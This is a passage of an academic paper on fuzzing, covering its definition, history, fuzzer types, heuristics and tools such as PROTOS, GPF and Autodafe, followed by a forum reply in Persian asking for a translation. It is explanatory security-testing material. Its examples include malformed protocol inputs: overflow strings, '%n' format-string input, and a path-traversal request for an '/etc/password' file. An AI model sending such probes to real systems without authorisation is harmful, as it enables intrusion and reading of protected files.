One method to ensure that products can and will be more thoroughly tested is adhering to a coding design that has high testability. If two code sets were compared and one was easy to test and the other was not, the former would be said to be better code [20]. Good internal data structures, instead of “tricky” pointer arithmetic, are one example. The data structures could be printed at any point in the code to determine the state of the data, while that might not be possible in the other case.
Most professional testers will tell you that automating testing via some type of test tool is a necessary aid, but that the tool should not replace creative thought in testing [17][18]. Most large companies are now using a combination of tools. Testing tools (could include a fuzzer) and code coverage suites, which are used to measure how well the testing went. Code coverage metrics are very useful, but can be abused [18]. This will be discussed in more detail later.
d. Summary


Testing is a very complex field. The focus of this paper will only be on a particular test tool known as a fuzzer. Standard software testing techniques focus on the correctness of software. Fuzzing concentrates on finding (exploitable) bugs. Both types of testing are important: if software does not do what it is supposed to do, that is a problem; if software has exploitable vulnerabilities that is a different problem. The advantage of looking for exploitable bugs is that one examines only part of a programs task and one focuses on breaking the code. Together that is a very different task than checking for correctness so it is not surprising that it can produce different results. Errors of omission are an interesting example. If a software writer omits some feature, say a proper bounds check, then it is not in the software to be checked and standard testing tools may miss the omission [18]. Fuzzers can find such errors.
3. Fuzzing

a. Definition


Fuzzing can be defined as:
“A highly automated testing technique that covers numerous boundary cases using invalid data (from files, network protocols, API calls, and other targets) as application input to better ensure the absence of exploitable vulnerabilities. The name comes from modem applications’ tendency to fail due to random input caused by line noise on “fuzzy” telephone lines.” [1]

The first person credited with carrying out a rudimentary form of fuzzing was Barton Miller from the University of Wisconsin-Madison in 1990 [7].
“There is a rich body of research on program testing and verification. Our approach is not a substitute for a formal verification or testing procedures, but rather an inexpensive mechanism to identify bugs and increase overall system reliability. We are using a coarse notion of correctness in our study. A program is detected as faulty only if it crashes or hangs (loops indefinitely). Our goal is to complement, not replace, existing test procedures.
While our testing strategy sounds somewhat naive, its ability to discover fatal program bugs is impressive. If we consider a program to be a complex finite state machine, then our testing strategy can be thought of as a random walk through the state space, searching for undefined states.” [7]

He found that supplying totally random input would crash many of the core UNIX utilities. Crashes indicate abnormal program behavior which in turn indicates potentially exploitable vulnerabilities. Programming, testing, flaw detection, and quality assurance have greatly improved since than, but code has also become more complex and bugs still exist. Fuzzers that supply totally random characters may yield some fruit, but in general, won’t find many bugs these days. As such, it is necessary for fuzzers to become more complex (evolve), if they hope to uncover such buried or hard to find bugs. Very obscure bugs have been called Second Generation Bugs. They might involve things like multi-path vulnerabilities such as non-initialized stack or heap bugs [36].
b. Terms and Examples


Coverage is an important term that is used in testing. Coverage typically referrers to code coverage; that is, how much of the existing source or compiled code has been tested [1]. Coverage could also point to path, data, or a variety of other coverage metrics. A related term is attack surface: the amount of code actually exposed to an attacker [1]. Some code is internal and cannot be influenced by external data. This code should be tested, but cannot be externally fuzzed and since it cannot be influenced by external data it is of little interest when finding vulnerabilities. Thus, our interests lie in coverage of the attack surface. This is especially true for security researchers. Quality assurance professionals may be tasked to fuzz all of the code.
“A trust boundary is any place that data or execution goes from one trust level to another, where a trust level is a set of permissions to resources.” [1] For example, data sent across a network to an application that parses that data is an example of crossing a trust boundary. If the root user of a UNIX system is the only one able to start a given application (via command line arguments), priority would probably go to fuzzing the network interface instead of the command line arguments for two reasons: a remotely exploitable bug is more interesting to attackers (since it can be done remotely), but in terms of trust boundaries an elevation of privilege (from none to whatever the process runs as) can occur in the remote situation. Conversely, if the user must already be root to gain root (unless a tricky method is devised to run the binary without root privileges) nothing has been gained, plus the attack would only be local(less of a liability to companies). Priority is important to software companies and attackers alike because the problem of finding bugs is difficult and time consuming. Neither is willing to waste much time (money) for purely academic reasons; fuzzing is known for its ability to produce results. The word “parses” is in bold above because complex parsers often have bugs. Thus, this a good place to fuzz. Fuzzing tends to use past mistakes as a guide to finding future bugs (source code auditors and reverse engineers will also leverage knowledge of past bugs).
Input source and input space are similar terms that refer to how data will be generated (and ultimately delivered) to the application to be fuzzed (target). The input space is the entire set of all possible permutations that could be sent to the target. This space is infinite, and that is why heuristics are used to limit this space. Attack heuristics are known techniques for finding bugs in applications. The examples below illustrate a few simple heuristics against an uncomplicated string-based client-server protocol:
Buffer overflow:
[Client]-> “user jared\r\n”
“user Ok. Provide pass.\r\n” <-[Server]
[Client]-> “pass <5000 ‘A’s>\r\n”

Integer overflows: (zero, small, large, negative: wrapping at numerical boundaries – 2^4, 2^8, 2^16, 2^24: wrong number system – floats vs. integers)
[Client]-> “user jared\r\n”
“user Ok. Provide pass.\r\n” <-[Server]
[Client]-> “pass jared\r\n”
“pass Ok. Logged in. Proceed with next command.\r\n” <-[Server]
[Client]-> “get [-100000.98] files: *\r\n”

Format attacks:
[Client]-> “user <10 ‘%n’s>”

Parse error: (NULL after string instead of \r\n)
[Client]-> “user jared0x00”

Parse error: (Incorrect order and combined command in one pkt)
[Client]-> “pass jared\r\nuser jared\r\n”

Parse error: (Totally random binary data)
[Client]-> “\xff\xfe\x00\x01\x42\xb5…”

Parse error: (Sending commands that don’t make sense – multiple login.)
[Client]-> “user jared\r\n”
“user Ok. Provide pass.\r\n” <-[Server]
[Client]-> “pass jared\r\n”
“pass Ok. Logged in. Proceed with next command.\r\n” <-[Server]
[Client]-> “user jared\r\n”

Parse error: (Wrong number of statement helpers such as ‘../’, ‘{‘, ‘(‘, ‘[‘, etc.)
[Client]-> “user jared\r\n”
“user Ok. Provide pass.\r\n” <-[Server]
[Client]-> “pass jared\r\n”
“pass Ok. Logged in. Proceed with next command.\r\n” <-[Server]
[Client]-> “get [1] files: {{../../../../etc/password\r\n”

Parse error: (Timing issue with incomplete command termination)
[Client]-> “user jared\r” (@ 10000 pkts/second with no read for server response)

Again, it is obvious that the input space is infinite. It would technically be possible to send totally random data and get the same effect as using heuristics, but instead of the fuzzer runtime being finite and reasonable it would be infinite and therefore unreasonable. Furthermore, with an increased number of tests comes an increased load of logging. It is desirable to be able to detect when a fault (bug) has occurred (been found); that’s the whole reason we’re fuzzing. Detection can be accomplished either by logging and time stamping everything generated by the fuzzer and comparing to application logs, and/or by incorporating a debugger which can detect and log signals (like SEGV) received by the application(s) under test. So the goal is to cover every meaningful test case (without too much duplication or unneeded sessions) and to log the ones that succeed in causing the target to fail in some way. “Other ways to check application correctness during fuzzing include looking for spikes in the program’s memory usage or CPU utilization, which could indicate that the application is using the malformed input to make calculations for memory allocation. It could also indicate an integer overrun condition if the program performs arithmetic operations on the input values.” [1] Tools such as OllyDbg, GDB, tools by sysinternals, etc. will be useful here.
c. Fuzzer Types


Fuzzer test cases are generated by the input source and attack heuristics. Test cases could also be developed manually instead of automatically, though it is not the preferred approach since many test cases will be needed. Input source refers to the type of fuzzer being used. There are two main types: Generation and mutation [1]. These have also been called full-blown and capture-replay. A generation fuzzer is a self-contained program that generates its own semi-valid sessions. (Semi-invalid has the same meaning in this context.) A mutation fuzzer takes a known good session, file, etc. and mutates the capture before replay to create semi-valid sessions. Mutation fuzzers are typically generic fuzzers or general purpose fuzzers, while generation fuzzers tend to be specific to a particular protocol or application. Understanding the nature of the attack heuristics, how this mutation or generation is accomplished, is important.
d. How Fuzzers Work


There are four main ways this semi-valid data can be created: Test cases, cyclic, random, or library.
· Test cases refers to a fuzzer that has X numbers of tests against a particular protocol. This type of fuzzer will only run against the protocol it was created to fuzz. This type of fuzzer will send the same tests each time it is run and typically keeps a good record of each test. This type of test tool most closely resembles traditional automated test tools or stress testing tools. The number of tests is relatively small compared to more random methods, but each test has a specific purpose. Typically these are generation fuzzers.
· Another way to send semi-valid input is to cycle through a protocol by inserting some type of data. For example, if we want to search for buffer overflows in the user name we could cycle data sizes from 1-10000 by say 10:
[Client]-> “user ja<1 A>red\r\n”
[Client]-> “user ja<11 A’s>red\r\n”
[Client]-> “user ja<21 A’s>red\r\n”

This method yields a deterministic number of runs and thus a deterministic runtime. (One might argue that only fixed buffers around known boundaries should be tested, but off-by-one errors (if a static buffer is of size 100 bytes sending exactly 101 bytes would be needed to trigger the bug) are a known issue.)
· One could also choose to keep randomly inserting data for a specified period of time:
[Client]-> “user ja<10000 A’s>red\r\n”
[Client]-> “user ja<12 A’s>red\r\n”
[Client]-> “user ja<1342 A’s>red\r\n”

Random fuzzers can be repeatable if seeded by the user. This is important for regression testing.
· Library refers to a list of known useful attacks. Each variable to be tested should be fuzzed with each type of attack. The order, priority, and pairing of this search could be deterministic, random, or weighted. Mature fuzzers will typically combine many of the above techniques.
e. Intelligent Fuzzing


Fuzzers can become as fancy as the imagination will allow. This is sometimes called the intelligence (protocol knowledge) of a fuzzer; intelligent fuzzing. Consider a fuzzer that randomizes the test type, position, and protocol leg in which to place the attack:
[Client]-> “us<50000 \xff’s>er jaed\r\n”
-------------------loop 1------------------------
[Client]-> “user ja<12 %n’s>red\r\n”
“user Ok. Provide pass.\r\n” <-[Server]
[Client]-> “\x34\x56\x12\x…\r\n”
-------------------loop 2------------------------
[Client]-> “user ja<1342 \x00’s>red\r\n”
-------------------loop 3------------------------
[Client]-> “user jared\r\n”
“user Ok. Provide pass.\r\n” <-[Server]
[Client]-> “\x04\x98\xbb\x…\r\n”
-------------------loop 4------------------------

We note that valid data, such as “user jared”, is transformed into semi-valid data, such as “usAAAAAAAAAAAAAAAAAAAAAAAAer jared”. The insertion could be done by working from a capture file or from internal generation of the protocol (or possibly a combination of the two). As Mr. Oehlert mentions, intelligent vs. unintelligent is always a trade off [1]. Creating intelligence takes more work, and typically begins to assume things about the protocol. For example, suppose our intelligent fuzzer assumes that the user command must always be correct and the first command, therefore there is no need to test it. Well, 98% of the time that’s a true assumption. But what about the odd case where a particular implementation reads in an arbitrary amount of data until the first space character? Or what if a command prior to user hangs the internal state machine? A balanced approach seems best: intelligence enough to decrease the runtime, but not so much that it weakens the fuzzer (i.e. makes the same poor assumptions the programmer did), and possibly costs too much to produce.
Another useful extension of intelligent fuzzing is for protocols that require calculations to be made on data that is sent or received. For example, an Internet Key Exchange (IKE - IPsec key exchange protocol) fuzzer would require the ability to deal with the cryptography of IKE if the fuzzer ever hopes to advance into the IKE protocol. Because of the complex nature of IKE, capture-replay is made very difficult. IKE might be a good candidate for a generation fuzzer with intelligence.
Still another intelligent feature that could be built into fuzzers is known as pattern matching [1] [42]. In the above heuristic examples, a pattern matching fuzzer could automatically find the strings in a capture file and build attacks based on that. It could also automatically find and fix length fields if the fuzzer inserts data [14]. Boundary conditions should be noted as important and included in any good pattern matching library. “If a given function F is implemented in a program and the function has two parameters x and y, these two have known or unknown boundaries a < x < b and c < y < d. What boundary testing does is test the function F with values of x and y close to or equal to a, b, c and d.” [21] Thus, if our intelligent fuzzer finds a variable with the value 3, it might first exercise the program under test with the values 2 and 4. Trying other key numeric values such as zero, negative, large positive, etc. might be the next phase. Finally wilder data such as wrong numeric systems, non-numeric, special characters, etc. would complete a sampling of each data quadrant without trying every possible value. Does this approach theoretically guarantee the discovery of the magic value (if one exists) that exercises a bug? No, but this is an example of how attack heuristics balance runtime and effectiveness.
f. Additional Factors that Influence Fuzzers


Finally, there are a few heuristics for fuzzing that don’t directly relate to the data. In fact they don’t directly relate to fuzzing, but more closely coincide with the umbrella term vulnerability analysis or vulnerability research. A vulnerability analyst (VA), security researcher (SR), or vulnerability researcher (VR) is one whose job is to search for bugs using any techniques available. Reverse engineering (RE), source code audits, and fuzzing are the three main techniques. The former two are typically static analysis and the later is an active search and any combination in between can and should be used. Vulnerability analysts tend to leverage the history of the application under test. Mr. Moore talks about SBDA ("same bug, different app") in a presentation recently delivered [10]. The idea is that coders sometimes make the same mistakes. Pretend 50% of web applications have had a particular bug in the GET command. Fuzzing the GET command in your new web application would be a good place to start looking for bugs. Historical weaknesses factor into fuzzing prioritization and attack heuristic creation.
Along those same lines is the localization or similarity search for bugs. This involves more intuition from a VA. If a portion of the target code has a minor (non-exploitable) bug, it might be wise to zero in on this area and fuzz more extensively. This is when the VA is like a shark and smells blood in the water. Generic fuzzing might suddenly switch to small targeted scripts, based on RE or source code work. Or on a different note, when format bugs were first announced everyone should have quickly retested all their code as this heuristic was not previously known. (Though in theory, this wouldn’t have taken too long to discover with some randomness in attack creation.) So, weak areas of an application or new heuristics can also influence fuzz priority.
g. Error Handling Routines


There has been a substantial amount of work done to fuzz the exception handling routines of programs. One such company, Security Innovation, Inc., has a tool called Holodeck whose primary function is just that [15]. The idea is that while you are fuzzing, the server may never run out of open files, hard disk space, memory, etc. Holodeck can simulate those error conditions (they call it fault simulation), and allow for the error-handling routines to be systematically tested.
h. Real Life Fuzzers


Much work has been done on generation fuzzers. Specifically a group known as Oulu has created a tool called the Mini-Simulation Toolkit (PROTOS) [34]. They used a context-free grammar to represent the protocol (language) and build anomalous test cases. This work is now carried on by Codenomicon, Ltd. Their work is impressive at finding bugs and creating a baseline tool: specific implementations of a protocol that are found to have flaws don’t pass, and those that are bug free pass the test. They admit that this approach is likely to have a pesticide effect: wide spread use of the tool will become less effective as the tool is run and bugs are repaired; shared knowledge (code and techniques) becomes more and more immune to the tool. This should happen to every bug finding tool that doesn’t employ randomness or isn’t updated; compare to regression testing.
In 2005, Mr. DeMott wrote a generic fuzzer (among other tools) known as GPF (General Purpose Fuzzer) [42]. GPF employs many of the elements discussed in this paper. It will be publicly released (along with this paper, presentation slides, an IKE fuzzer tool, and a local *NIX command line fuzzing tool) on August 5th at DEF CON 14 [43]. Go to www.appliedsec.com (http://www.appliedsec.com/) for more information.
Impressive work on a generic fuzzing technique and tool (known as Autodafe) has recently been done by Mr. Vuagnoux [22]. Autodafe includes automatic protocol detection with manual updating available, a large list of attack stings, and an incorporated debugger to dynamically place weights on areas of target code that utilize external data in dangerous functions. Multiplying the number of attack strings by the number of variables to fuzz yields the complexity. By minimizing and ordering the tests, the overall runtime is decreased.
This is certainly efficient when compared with other more random methods. However, the power of randomness is completely replaced by lists of known issues. Much is unknown about the exact workings of Autodafe because the tool has yet to be released as of the writing of this paper.
There are many other fuzzers for sale or download [41].
i. Taxonomy


There has been little research comparing and contrasting fuzzers types. Each seems to have different strengths and weaknesses. Generation fuzzers have the advantage of possibly being more complete and having test cases tailored to the particular protocol. It’s difficult for generic fuzzers to get a good capture that includes every possible leg/state of a protocol. But good generic fuzzers can easily be extended to be as complete as generation types [22] [42]. Generation works against only one protocol, and the fuzzer must be re-written or extended for any new fuzzing task. Generic fuzzers need a new capture or plug-in for each new protocol, but the meat is already there and this core knowledge (timing, heuristics, attack list, etc.) is retained and extended across projects. With generic fuzzers, security researchers have a consistent interface for fuzzing. Generation fuzzers typically require more programming per task, but the test results are sometimes better recorded (since there tends to be less tests). Generic fuzzers require more up front work, but tend to produce more tests, and the results can also be quite detailed. In either case, developing fuzzers that are specific to a particular source code tree is expensive. Fuzzers tend to be developed for particular protocols and used on multiple projects to increase their usefulness and decrease their cost. That is when a company that writes and FTP server may just purchase an FTP fuzzer. Is this the best option? The answer lies in the organizations in-house expertise and budget. Or if that same company had or could buy a generic fuzzer a FTP capture would be about the only thing needed. (Besides the obvious of an experienced test team familiar with FTP and VA work in general.)
The fuzzer that finds more bugs is ultimately the best, but this is very difficult to measure since before testing it is unknown if bugs exist. If we already know bugs exist the fuzzer could be tailored to find them. An experiment where independent parties develop a fuzzer (one generation and the other generic) for a protocol which has bugs that only a third party knows about would shed some empirical light. Yet, more theory would be better. It’s safe to assume that all fuzzers could miss some bugs. Every situation, protocol, and/or application is different. The best testing method(s) seems to vary from project to project and should be determined by the projects leaders and an experienced testing team.
j. Vulnerability scanners and fuzzers


A vulnerability scanner sweeps a host or network for previously discovered bugs via a list of vulnerability signatures; compare to traditional virus cleaning software. However, many virus products are doing more to protect your computer these days. Many virus companies have combined personal firewalls, web privacy, spam filters, anomalous system behavior detection and reporting, etc. Thus, it seems likely that professional fuzzing or vulnerability scanning companies will combine fuzzing and scanning technologies in new and interesting ways.
k. Summary


As each new research project is brought to life and grown, the balance beam flips back and forth. For example, more random tools and scripts (like Millers original tool) were at one point state of the art. Fuzzing frameworks like SPIKE came out and showed us all a better way to fuzz. PROTOS hit the scene and was clearly superior. Many impressive generic fuzzers like GPF and Autodafe are in use as I write. Like so many fields, fuzzing is evolving.
Another interesting reason fuzzing has been effective is that it fills a void or gap. Testing is always incomplete is some way. Therefore, if an external tool does something different from internal company tools, even if it is an inferior tool, it may produce different results (i.e. find a bug they missed). Therefore, private fuzzers may always retain some value. Companies are beginning to fuzz more and more, and some have turned to commercial fuzzers. Considering all this, it makes one ponder, will hackers eventually need new ways to find bugs if fuzzers became very effective and continue to be widely adopted by companies? Companies will/are producing more secure code and running them in safer (stack/heap protected) environments. This is good news for security, but there will always be some testing gap and so it seems likely there will be a use for tools like fuzzers (and all other VA work) for the foreseeable future.
4. Conclusion


Bug detection tools known as fuzzers are a useful part of software testing and vulnerability analysis. The best fuzzers of today are built by experienced vulnerability analysts and testers, and employ the power of automatic protocol descriptions, randomness, known useful heuristics, tracing/debugging, logging, and more.
5. Open Questions and Future Work

a. Formality


You will have noticed no formalism of fuzzing in this paper: we have not been able to find any formalism related to fuzzing. It is clearly a difficult problem because vulnerability is not a well-defined concept except the implicit notion that some error has occurred and might be exploited. Formalizing mistakes is difficult. Traditional testing can focus on what is expected in the design whereas fuzzing focuses on the unexpected. If you could formalize the unexpected, it might be expected. Exposing some formalism would be wonderful, and we will try, but we will be surprised if we succeed.
b. Metrics


Formal fuzzing metrics do not exist, yet metrics would be extremely useful. Two fundamental and practical questions related to metrics exist:


what makes one fuzzer “better” than another and

how long should it run (beyond “a while” or “until we find a bug”)?

Many people have created fuzzers for many protocols and applications, and it’s clear that some fuzzers are better than others at finding bugs. Why? Factors involved are: Completeness, complexity, incorporated heuristics, experience of the fuzzer developer and test team, familiarity with the protocol, type of fuzzer, type of protocol/application, length of the run(s), total testing time, amount of previous in-house company testing, budget, etc.
The quality of a fuzzer is related in some way to coverage—code which has been executed as part of a test was “covered.” Certainly, if exposed code is not covered, the code was not tested, and this is not good. However, simply covering all code at least once does not define a complete test. We have come to the conclusion that the current definition(s) of coverage are insufficient [18]. It is clear that although all of the desired code could be covered; it may not have been covered “right”. Particular paths, with particular inputs, through the code could lead to bugs in code that has already been covered. Again, coverage can only tell us if we’ve missed code, not if we’ve correctly covered code or if more code should exist (faults of omission). Thus, we need knowledge of all paths with all data to claim something more useful about coverage. This is the infinite problem.
As a start, it could be useful to combine code coverage with bounds on the inputs which test that code. For example, we wonder if there is some new measure, something like an “iterations per state” count, which could be used as a finite measure of state coverage instead of code or path coverage. With that in hand we might be able to estimate how much useful work a fuzzer has done. If that measure was effective, we would know something about the quality of the fuzzer.
We would also like to know how long this new fuzzer must run for it to be called a “good” (complete, sufficient, etc.) run. If a fuzzer is deterministic we will easily know how long it will run. But if heavy amounts of random or dynamic decisions are employed it becomes a more difficult problem. If we are able to produce a good test (both in terms of coverage and time) of a given protocol, we believe those that fuzz would highly benefit from this work.
c. Generic Fuzzer


To date, most fuzzers have been custom built for each application or protocol. Fuzzers which can be readily tuned for particular protocols exist. For example, PROTOS takes as input a BNF specification of a protocol which it uses to generate test cases. However, constructing the needed BNF file is difficult. We have been looking into developing a generic fuzzer which could learn its target and generate test cases appropriately.
We intend to build on existing fuzzing knowledge to advance the state of fuzzing. For example: if after Autodafe completes, and no interesting bugs were discovered, it would be advisable to continue fuzzing with increased randomness. Random attacks (data mutations), random states, random number of concurrent sessions, etc. will broaden the input space. As no bugs continue to be discovered it’s likely the runtime will approach the input space – infinite. A reasonable cutoff time should be able to be determined to call the run complete. Or perhaps a tool with some known cut off time (say we have a maximum of 20 days to fuzz) could use that knowledge to order test cases appropriately.
Additionally a generic fuzzer with all of the following attributes would be novel and very useful (GPF and Autodafe contain much but not all of this):


Automatic Protocol Detection

Our generic fuzzer should listen and learn. That is, our source data comes from sniffing a live session. The generic fuzzer should than convert that data into a neutral format where it can be manually extended by the tester. Plug-ins can be developed to allow calculations based on received data, such as encrypted protocols. If done right, this technique will allow for the rapid fuzzing of most any text or binary protocol.


Tokenizing

The generic fuzzer should than tokenize each piece of data to an internal format. Stings, binary data, and length fields should be automatically detected and fuzzed upon replay. This makes the process from capture to fuzz that much faster and useful.


Strong Attack Heuristics

The capture data should than be sent back to the target with intelligent and/or random attacks intelligently and/or randomly inserted. Null, format, or large strings are examples of intelligent replays. Changing the post-amble (\r\n for string protocols), length fields, parsers (brackets, parenthesis, quotes, etc.) are further examples. Bits could be randomly flipped and/or inserted in specific and/or random positions. Another useful technique is to change or randomize the ordering and paring in which valid commands are sent to the target.


Intelligent Randomness

Properly weighting what happens (i.e. which heuristics and how) at each stage will influence how well our fuzzer performs, particularly in terms of time. There has been no research other than Vuagnoux’s suggesting a proper method for doing this. Much of what’s done is based on the notion of proper functionality a “majority” of the time (i.e. semi-invalid...not totally invalid). Or it’s simply based on personal preference or “gut instinct”.


Debugging

The generic fuzzer should be remotely attached to the process under test to determine when a fault occurs. Also the debugger could be used to get real-time statistics on code/path coverage. Mr. Vuagnoux uses the debugger to dynamically identify dangerous functions and weight the fuzzer toward those paths. Vuagnoux says he’s solved another major hurdle by creating a tracer that runs on both Windows and UNIX so his tool is applicable for either platform. There is one minor issue with attaching a debugger to a process to determine when faults have occurred. In rare cases, attaching a debugger will actually change the program enough that it will mask the presence of certain timing related bugs. The latest sendmail bug is the best example in a while.


Distributed Fuzzing

It is possible to split the load of fuzzing across hosts (targets = “fuzzies” and sources = “fuzzers”). This should decrease the total runtime. Tasking in a deterministic fashion will require a central fuzz server that partitions out the work load. Another possible method to decrease run time is to start multiple instances running with randomness as the driving force. For generic fuzzers, the capture file could even be file fuzzed before each instance is started, using a list of valid protocol commands and known useful heuristics. [42] The problem with this approach is that debugging is difficult. A central debug relay would be required. It’s also difficult to determine a sane stopping point, other than “when we find a bug”. Image if a crash happens when 50 fuzzers are running as fast as possible and no central debug relay is in place; for tricky bugs it could be difficult to say why/when/if the application died. On the other hand this technique may be useful for targets where no bugs can be found with any other technique. The target will be under heavy load, handling many malformed sessions as fast as possible. And again, the amount of test cases covered could be dramatically increased.
d. Evolving Fuzzer


What about a fuzzer which evolves? Genetic algorithms (GAs) are good at solving problems for which no optimal solution exists, and they have been used with limited success to test software [37, 38]. Given those results, it may be possible to formulate an expression for gene as well as an objective function for a fuzzer to which we could apply GA techniques. In addition, genetic programming might be applicable to develop code which evolves [39]. Such an approach might not only result in a generic fuzzer, but it might also result in a fuzzer which can learn, grow, and evolve. There are many emerging methods for dynamically determining if a program has violated (a bug) it’s original construction [35]. Combining that technology into an adaptive fuzzer could prove to be very interesting.
Works Cited
[1] Peter Oehlert, “Violating Assumptions with Fuzzing”, IEEE Security & Privacy, Pgs 58-62, March/April 2005
[2] Michael Howard, “Inside the Windows Security Push”, IEEE Security & Privacy, Pgs 57-61, January/February 2003.
[3] Dave Aitel, http://www.immunitysec.com/company-people.shtml (http://www.immunitysec.com/company-people.shtml), Developer of SPIKE a fuzzing framework and founder of Immunitysec a security research company.
[4] Kevin Mitnick, http://www.tectonic.co.za/view.php?src=rss&id=839 (http://www.tectonic.co.za/view.php?src=rss&id=839), Infamous hacker speaks on using fuzzing to hack.
[5] Gleg Ltd., http://www.gleg.net/ (http://www.gleg.net/), A company that sells fuzzers.
[6] Liveammo. http://www.liveammo.com/LiveAmmo_Reverse_Engineering_Training.php (http://www.liveammo.com/LiveAmmo_Reverse_Engineering_Training.php) Offers various high tech training courses including a “restricted” one on RE and Fuzzing.
[7] Barton P. Miller, Lars Fredriksen, Bryan So, “An empirical study of the reliability of Unix Utilities”, Communications of the ACM, 33(12):32--44, December 1990.
[8] M. Sutten and A. Greene, “File Fuzzing”, BlackHat Conference, Las Vegas, NV, July 2005
[9] Ejovi Nuwere & Mikko Varpiola, “The Art of Sip Fuzzing and Vulnerabilities found in SIP”, BlackHat Conference, Las Vegas, NV, July 2005
[10] Brett Moore, “SBDA - same bug, different app”, Ruxcon 2005, security-assessment.com
[11] Giovanni Vigna, “Testing and Analysis”, University of California Santa Barbara, http://www.cs.ucsb.edu/~vigna (http://www.cs.ucsb.edu/~vigna), Fall 2005
[12] Ilja van Sprundel, ”Fuzzing: Breaking Software in an Automated fashion”, Decmember 8th, 2005, http://events.ccc.de/congress/2005/fahrplan/attachments/582-paper_fuzzing.pdf (http://events.ccc.de/congress/2005/fahrplan/attachments/582-paper_fuzzing.pdf)
[13] Ilja van Sprundel, “Fuzzing”, 22nd Chaos Communication Congress, Berlin, 2005, http://www.digitaldwarf.be/library.html (http://www.digitaldwarf.be/library.html)
[14] Dave Aitel, “The Advantages of Block-Based Protocol Analysis for Security Testing”, February, 4 2002. New York, New York. http://www.immunitysec.com/downloads/advantages_of_block_based_analysis.txt (http://www.immunitysec.com/downloads/advantages_of_block_based_analysis.txt)
[15] A Professional Software Testing Company,
http://www.securityinnovation.com/holodeck/index.shtml (http://www.securityinnovation.com/holodeck/index.shtml)
[16] Ghulam Khan, “Test Coverage Analysis: A method for Generic Reporting” Thesis for Master of Technology from Indian Institute of Technology, Kanpur. April 2000.
[17] http://www.io.com/~wazmo/qa/ (http://www.io.com/~wazmo/qa/), “A case for automated testing”, Software Testing Hotlist - Resources for professional testers.
[18] Brian Marick, “How to Misuse Code Coverage”, http://www.testing.com/writings/coverage.pdf (http://www.testing.com/writings/coverage.pdf)
[19] James A. Whittaker, "Stochastic Software Testing", Annals of Software Engineering, 4, 115-131, 1997
[20] James A. Whittaker, "What is Software Testing? And Why is it so Hard?”, IEEE Software, Pgs 70-79, Jan/Feb 2000
[21] Felix 'FX' Lindner speaks out on Fuzzing. “The big Fuzz”, The Sabre Lablog, http://www.sabre-labs.com/ (http://www.sabre-labs.com/), March 13, 2006
[22] Martin Vuagnoux, “Autodafé: an Act of Software Torture”, 22nd Chaos Communication Congress, Dec. 2005, (http://events.ccc.de/congress/2005/fahrplan/events/606.en.html (http://events.ccc.de/congress/2005/fahrplan/events/606.en.html)).
http://autodafe.sourceforge.net (http://autodafe.sourceforge.net/)
[23] CMM Basics. http://www.karkhanisgroup.com/cmm/ (http://www.karkhanisgroup.com/cmm/)
[24] Christopher Koch, "Bursting the CMM Hype", CIO Magazine, March 2004 http://www.cio.com/archive/030104/cmm.html (http://www.cio.com/archive/030104/cmm.html)
[25] Definition of software testing. http://en.wikipedia.org/wiki/Software_testing (http://en.wikipedia.org/wiki/Software_testing)
[26] Definition of fuzzing. http://en.wikipedia.org/wiki/Fuzzing (http://en.wikipedia.org/wiki/Fuzzing)
[27] Steve Lipner and Michael Howard, “The Trustworthy Computing Security Development Lifecycle”, March 2005, http://msdn.microsoft.com/security/default.aspx?pull=/library/en-us/dnsecure/html/sdl.asp (http://msdn.microsoft.com/security/default.aspx?pull=/library/en-us/dnsecure/html/sdl.asp)
[28] The Digital Dwarf Society, a group that strongly believes in fuzzing. http://www.digitaldwarf.be/ (http://www.digitaldwarf.be/)
[29] Scott A. Maxwell, “The Bulletproof Penguin”, Secure Linux through fuzzing,


http://home.pacbell.net/s-max/scott/bulletproof-penguin.html (http://home.pacbell.net/s-max/scott/bulletproof-penguin.html)
[30] Rick Hower, “What types of testing should be considered”, http://www.softwareqatest.com/qatfaq1.html#FAQ1_1 (http://www.softwareqatest.com/qatfaq1.html#FAQ1_1)
[31] Good page on various Fuzzing tools and techniques out there.
http://www.scadasec.net/secwiki/FuzzingTools (http://www.scadasec.net/secwiki/FuzzingTools)
[32] Roger Grimes, “The buzz about fuzzers”,
http://www.infoworld.com/article/05/09/09/37OPsecadvise_1.html (http://www.infoworld.com/article/05/09/09/37OPsecadvise_1.html)
[33] Larry Seltzer, “The Future of Security Gets Fuzzy”,
http://www.eweek.com/article2/0%2C1895%2C1914332%2C00.asp (http://www.eweek.com/article2/0%2C1895%2C1914332%2C00.asp)
[34] Rauli Kaksonen, “A Functional Method for Assessing Protocol Implementation Security”, Technical Research Centre of Finland, VTT Publications
http://www.ee.oulu.fi/research/ouspg/protos/analysis/WP2000-robustness/ (http://www.ee.oulu.fi/research/ouspg/protos/analysis/WP2000-robustness/)
[35] J. Giffin, S. Jha, and B. Miller, “Efficient context-sensitive intrusion detection”, In 11th Annual Network and Distributed Systems Security Symposium (NDSS), San Diego, CA, Feb 2004.
[36] Halvar Flake, “Attacks on Uninitialized Local Variables”, Sabre-security.com, Black Hat Federal, 2006
[37] A. Watkins, D. Berndt, K. Aebischer, J. Fisher, L. Johnson, "Breeding Software Test Cases for Complex Systems," hicss, p. 90303c, Proceedings of the 37th Annual Hawaii International Conference on System Sciences (HICSS'04) - Track 9, 2004
[38] C. C. Michael, G. E. McGraw, M. A. Schatz, and C. C. Walton, “Genetic algorithms for dynamic test data generation”, Technical Report RSTR-003-97-11, RST Corporation, Sterling, VA, May 1997
[39] Sara Reese Hedberg, "Evolutionary Computing: The Rise of Electronic Breeding," IEEE Intelligent Systems, vol. 20, no. 6, pp. 12-15, Nov/Dec, 2005
[40] Codenomicon Ltd., http://www.codenomicon.com/ (http://www.codenomicon.com/), A company that sells fuzzers.
[41] Matthew Franz, http://www.threatmind.net/secwiki/FuzzingTools (http://www.threatmind.net/secwiki/FuzzingTools), List of Fuzzers
[42] Jared DeMott, http://www.appliedsec.com (http://www.appliedsec.com/), Vulnerability researcher focused on Fuzzing, Released a free General Purpose Fuzzer (GPF) useful for finding bugs in most any protocol.
[43] www.defcon.org (http://www.defcon.org/), Unique Security Conference

AliR3za
14-10-2006, 23:27
salam
به خاطر گذاشتن چنیم مقاله های پروفشیونالی تشر میکنم و منبه شخصه از شما میخام کهبازم بزارین ولی یه مشگلی هست که عزیز جوون والا من که با سواد سوم دبیرستان نفهمیدم چی میگه اگه ممکنه یا خوده شما این مقالهرو ترجمه کنید یا دوتانی که انگلیسی سرشون میشه ان مقاله رو لطفاً ترجمه کنن چون اط تریفهای جناب پستو که ظاهراً باید قاله مفیدی باشه
